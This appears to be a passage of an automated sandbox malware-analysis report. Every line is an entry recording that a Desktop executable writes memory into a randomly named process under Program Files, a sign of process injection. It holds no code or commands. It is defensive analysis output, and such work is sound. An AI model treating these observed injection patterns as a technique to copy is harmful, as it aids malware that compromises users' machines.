        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: B20000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: B30000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2110000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2160000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2AD0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2C20000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 810000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 820000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2A60000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2A70000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1200000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1210000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: F50000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: F60000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 23B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2400000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: B80000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: B90000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 7D0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 7E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2EC0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2F10000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1150000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1160000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: D50000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: D60000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 25E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2640000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2D40000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2D50000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2B10000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2C60000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 11E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 11F0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 11D0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 11E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 670000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 680000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 810000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 820000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 14A0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 14B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: E60000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: E70000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 8B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 8C0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 860000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 870000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 24A0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 24F0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 9B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: A00000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: AF0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: B00000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: B00000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: B10000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: D20000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: D30000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1260000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1270000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: FB0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: FC0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: E50000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: E60000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 12A0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 12B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2080000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2090000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2F50000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2A20000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2A30000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2570000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2580000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 12D0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1320000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 28A0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 28B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1160000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 1170000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 9D0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 9E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: AB0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: AC0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2210000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2220000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: F80000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: F90000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2700000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 2750000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files (x86)\tYMJcUwLIruuPEZJYgmdvQkNNMXgSxEIjpCFRJwRUidVdDBvVsJqw\IbEUOdTjaKPFNFCSv.exe base: 10B0000Jump to behavior
